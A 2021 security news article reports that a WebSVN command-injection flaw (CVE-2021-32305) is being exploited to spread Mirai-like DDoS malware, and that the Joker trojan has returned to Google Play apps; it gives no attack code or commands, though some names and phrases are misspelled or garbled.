Posted on September 1, 2021 at 4:33 PM
Security researchers at Palo Alto Networks’ Unit 42 have discovered a vulnerability affecting WebSVN being exploited by threat actors. According to the researchers, the hackers are exploiting the bug to plant variants of the Miraaj DDoS malware.
The Hackers Can Use Brute Force Approach
The threat actors, according to the researchers, can use a brute force approach to get into the devices and plant their malware. They also utilize malicious Linux binaries used for different architectures. The brute force approach is used to speed up their exploration process as the script can download and execute binaries for all architecture. This will get rid of any incompatible errors.
The threat actors prefer to use Linux binaries even though the WebSVN can be used to run different operating systems.
The Bug Has Been Patched But Hackers Are Still Probing
Although the patch for the vulnerability was released earlier in May this year, threat actors are still exploiting the versions yet to be patched. It means that users that have not applied the patch to the bug are vulnerable to the ongoing exploit. The vulnerability is known as CVE-2021-32305, and it affects the 2.6.0 version of the software.
When the proof-of-concept was released in June, threat actors launched their attack and tried exploiting the version, deploying variants of the Miraj DDoS malware.
As the researchers reported, threat actors are using command injection to download a shell script that can infiltrate the target system.
However, the attacker may not know some important details of the target environment when they are abusing these types of bugs. Details such as processor architecture and the target’s operating system that the web server is running may not be known, making it a bit difficult for the hacker to succeed. However, some of the highly technical ones may scale through and penetrate the targeted device.
“The shell script used in the next step of the attack shows how the attacker can overcome this issue,” the researchers added.
The Malware Connects To The Hackers’ C2 Servers
The researchers, after analyzing the situation, stated that the threat actors carry out DDoS attacks using the malware, which has similar codes with the Miraj botnet family.
Also, the threat actors used an updated version of the open-source packer, UPX, to reduce the size of the files. The researchers, while commenting about the nature of the malware, stated that when it is executed, the malware connects to the command and control (C2) server of the hackers. After establishing a connection, it uses a custom text-based TCP protocol to pass information to the C2 server.
According to the researchers, the malware family is designed primarily to carry out DDoS attacks. But not all hackers can be successful in the breach because it depends on the technique used and the network protocols.
The researchers also placed the attacks into eight groups, and each of them can infiltrate a different type of target.
The sad thing is, the threat actors will keep exploiting the flaws to increase the capacity of their DDoS attacks and expand their army of infected devices, according to the researchers. As a result, users have been advised to upgrade their systems as soon as possible to avoid being victims of their exploitations.
As the patch for the vulnerabilities has been released, the impact of the exploits may not be felt too much. But the few users that will fall, victims, are those that did not upgrade their devices with the latest patch.
Joker Virus Is Back Again
In another development, the notorious Joker virus has been discovered again in the wild. In July, when the malware was last seen, it was being delivered through apps on Google Play Store.
The malware has already been detected in eight apps in the Google Play Store, although they have been deleted by the tech giant. But the malicious code may still be existing in other apps.
The Joker Trojan comes from the Bread malware family. Its main focus is on mobile hacking bills, where it authorizes operations without the knowledge of the user. It also can enter SMEs and contact on the infected device. But more alarming is the fact that the malware can subscribe users to paid services without the users’ consent or awareness.